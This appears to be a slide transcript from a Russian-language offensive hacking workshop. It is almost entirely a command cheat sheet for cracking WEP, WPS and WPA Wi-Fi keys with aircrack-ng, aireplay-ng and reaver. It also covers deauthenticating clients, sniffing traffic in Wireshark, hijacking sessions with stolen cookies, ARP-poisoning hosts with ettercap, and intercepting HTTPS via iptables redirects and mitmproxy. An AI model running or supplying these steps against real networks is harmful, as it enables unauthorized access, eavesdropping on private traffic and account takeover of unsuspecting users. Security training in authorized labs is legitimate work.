get inside stage2 new
TRANSCRIPT
Немного теории
WEP (wired equivalent privacy)
Недостатки: коллизии IV. Для атаки на WEP необходимо несколько 10К кадров с IV.
Подготовка интерфейса
iwconfig – перечень wi-fi интерфейсов
service network-manager stop - остановка посторонних сервисов
airmon-ng start <интерфейс> - создание виртуального promiscous интерфейса.
Ломаем WEP
airodump-ng -w <имя_файла> --bssid <bssid> -c <канал> mon0 - запись траффика с векторами инициализации.
aircrack-ng <cap._файл> - ломаем ключ WEP
Ломаем WEP
aireplay-ng --arpreplay -b <bssid> mon0 - arp-replay атака.
aireplay-ng --deauth 1 -a <BSSID> mon0 деаутентификация клиента для получения arp пакета
Ломаем WEP
aireplay-ng --arpreplay -b <bssid> -x 20 mon0 - arp-replay атака, с ограничением 20 пакетов в секунду.
Wireshark, анализ трафика
iwconfig <interface> channel <channel> - настройка интерфейса на прослушивание на определенном канале
Capture->Interfaces->mon0->Start - анализ трафика на интерфейсе mon0
Wireshark, анализ трафика
wlan.bssid == <bssid> - фильтр отображения по bssid
Edit->Preferences->Protocols->IEEE_802.11->Edit->New-><wep key> - настройка дешифрования трафика
Wireshark, анализ трафика
http - фильтр отображения http пакетов.
follow tcp stream - сбор TCP сессии
Угон сессии
Устанавливаем в браузер перехваченный токен сессии (Firefox - “Cookie manager”. Chromium - “Edit this cookie”).
PROFIT!
Сканирование
ifconfig - список сетевых интерфейсов с присвоенными ip адресами
nmap -sn <диапазон адресов> - поиск активных хостов в диапазоне адресов
ARP poisoning
echo 1 > /proc/sys/net/ipv4/ip_forward - включаем форвардинг пакетов
ettercap -T -M arp -o -i wlan1 /<target1_ip>/ /<target2_ip>/ - митм трафика между целевыми хостами
Wireshark, анализ трафика
iwconfig <interface> channel <channel> - настройка интерфейса на прослушивание на определенном канале.
Capture->Interfaces->wlan1>Start - анализ трафика на интерфейсе wlan1
Вскрываем HTTPS
by Ettercapnano /etc/ettercap/etter.conf - редактируем файл конфигурации
ettercap -T -M arp -i wlan1 /<target1_ip>/ /<target2_ip>/ - перехват и просмотр траффика
Вскрываем HTTPS
by mitmproxy
echo 1 > /proc/sys/net/ipv4/ip_forward - включаем форвардинг пакетов
iptables -t nat -A PREROUTING -i wlan1 -p tcp --dport 80 -j REDIRECT --to-port 8080
Вскрываем HTTPS
iptables -t nat -A PREROUTING -i wlan1 -p tcp --dport 443 -j REDIRECT --to-port 8080
ettercap -T -M arp -o -i wlan1 /<target1_ip>/ /<target2_ip>/ - митм трафика между целевыми хостами
mitmproxy -T - запускаем mitmproxy
Установка mitmproxy
apt-get install python-pip
apt-get install libxml2-dev
apt-get install libxslt-dev
pip install --upgrade six
pip install mitmproxy
pip install --upgrade mitmproxy.
Для тех, кому не хватило
Ломаем WPS
wash -i mon0 - список ТД поддерживающих WPS
reaver -i mon0 -b <ap_bssid> - взлом ТД по WPS
Ломаем WPA
airodump-ng -w <имя_файла> --bssid <bssid> -c <канал> mon0 - запись траффика с хендшейком.
aireplay-ng --deauth 1 -a <BSSID> mon0 деаутентификация клиента для получения 4-way handshake
Ломаем WPA
/usr/share/wordlists/rockyou.txt.gz - расположение словаря
gzip -d /usr/share/wordlists/rockyou.txt.gz - распаковка словаря
aircrack-ng <.cap_файл> -w <файл_словарь> - взлом хендшейка по словарю